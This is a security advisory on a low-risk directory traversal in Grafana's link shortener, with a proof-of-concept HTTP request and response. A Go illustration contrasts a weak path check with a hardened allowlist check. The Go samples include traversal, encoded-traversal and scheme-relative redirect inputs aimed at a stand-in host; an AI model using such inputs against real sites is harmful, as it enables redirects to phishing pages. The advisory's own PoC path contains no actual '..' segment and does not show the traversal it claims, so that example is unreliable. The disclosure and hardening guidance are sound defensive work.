usd-2021-0024 | Grafana

Advisory ID: usd-2021-0024
Affected Product: Grafana
Affected Version: < v8.1.3
Vulnerability Type: CWE-20: Improper Input Validation (https://cwe.mitre.org/data/definitions/20.html)
Security Risk: Low
Vendor URL: https://grafana.com/ 
Vendor Status: Fixed

Description

Grafana before v8.1.3 is vulnerable to Directory Traversal in its Link-Shortener.

If the Grafana instance is deployed alongside other applications on the same domain (for example under different path prefixes), this directory traversal allows a shortened link to redirect to arbitrary paths on that domain, outside of Grafana's base path.

Grafana allows users to shorten their sharing links using its link shortener. A filter is in place that only accepts relative URLs, but it does not reject path meta characters such as .., so a shortened link can reference arbitrary resources outside of Grafana's base path.

Proof of Concept (PoC)

Note: the setup that was analyzed consisted of multiple applications deployed under different paths of the same domain (usd.de/a/, usd.de/b/, ...).

An example request containing a directory traversal:

POST /monitoring/api/short-urls HTTP/2
Host: usd.de
[...]

{
"path":"pentest/....test"
}

The API responds with a shortened URL. When this URL is opened, Grafana answers with a redirect whose Location header contains the unsanitized path, so the browser is sent to an arbitrary path on the domain:

HTTP/2 302 Found
Content-Length: 76
Location: https://usd.de/monitoring/pentest/....test
Cache-Control: no-cache
[...]

<a href="https://usd.de/monitoring/pentest/....test">Found</a>.

Fix

It is recommended to harden the link shortener implementation: treat all user input to the application as potentially malicious, verify every input and reject or replace it where necessary, and handle path meta characters such as .. with care. Use whitelisting (allowlisting) of permitted path shapes wherever possible instead of only rejecting absolute URLs.
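The following Go program is an added illustration for this advisory and is not Grafana's code or its actual fix. It contrasts a relative-URL-only check of the kind described above (vulnerableAccept) with an allowlist-style check (hardenedAccept) that rejects dot segments, percent-encoded dot segments, backslashes, absolute paths and scheme-relative URLs, and it resolves a stored path against the Grafana base URL the way a browser resolves the Location header so the effect of the traversal is visible. The function names, the base URL https://usd.de/monitoring/ and the sample paths such as pentest/../../test are constructed for the example and are not the advisory's literal request.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// vulnerableAccept mirrors the weak check the advisory describes: the short-URL
// path only has to be "relative", i.e. not an absolute URL and not starting with
// a slash. Dot segments such as ".." pass straight through. (Hypothetical, not
// Grafana's code.)
func vulnerableAccept(p string) bool {
	u, err := url.Parse(p)
	if err != nil {
		return false
	}
	return !u.IsAbs() && !strings.HasPrefix(p, "/")
}

// hardenedAccept is an allowlist-style replacement: the value must parse as a
// URL reference with no scheme, host, userinfo or opaque part, must not contain
// backslashes (browsers treat them as slashes), must not start with a slash, and
// every decoded path segment must be a plain name (no "", "." or "..").
func hardenedAccept(p string) bool {
	if p == "" || strings.Contains(p, "\\") {
		return false
	}
	u, err := url.Parse(p)
	if err != nil || u.Scheme != "" || u.Opaque != "" || u.Host != "" || u.User != nil {
		return false
	}
	if u.Path == "" || strings.HasPrefix(u.Path, "/") {
		return false
	}
	// u.Path is percent-decoded, so "%2e%2e" already reads as ".." here.
	for _, seg := range strings.Split(u.Path, "/") {
		if seg == "" || seg == "." || seg == ".." {
			return false
		}
	}
	return true
}

// resolveRedirect resolves a stored short-URL target against the Grafana base
// URL the way a browser resolves the Location header, showing where the redirect
// lands once dot segments are collapsed.
func resolveRedirect(baseURL, p string) (string, error) {
	base, err := url.Parse(baseURL)
	if err != nil {
		return "", err
	}
	ref, err := url.Parse(p)
	if err != nil {
		return "", err
	}
	return base.ResolveReference(ref).String(), nil
}

func main() {
	// Constructed sample inputs (not the advisory's literal request).
	base := "https://usd.de/monitoring/"
	for _, p := range []string{
		"d/abc123/dashboard?orgId=1", // legitimate sharing path below the base path
		"pentest/../../test",        // traversal out of the base path
		"//evil.example/phish",      // scheme-relative URL, lands on another host
		"%2e%2e/admin",              // encoded traversal: browsers collapse %2e%2e
		//                              per the WHATWG URL spec, Go's net/url does not
	} {
		target, _ := resolveRedirect(base, p)
		fmt.Printf("%-28s vulnerable=%-5v hardened=%-5v -> %s\n",
			p, vulnerableAccept(p), hardenedAccept(p), target)
	}
}
```

Checking the decoded u.Path rather than the raw string is what catches the percent-encoded variant; checking per segment rather than with strings.Contains(p, "..") is what keeps legitimate names such as "....test" or "v2..final" acceptable while still rejecting real dot segments.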

References

Timeline

Credits

This security vulnerability was found by Tobias Hamann and Lauritz Holtmann of usd AG.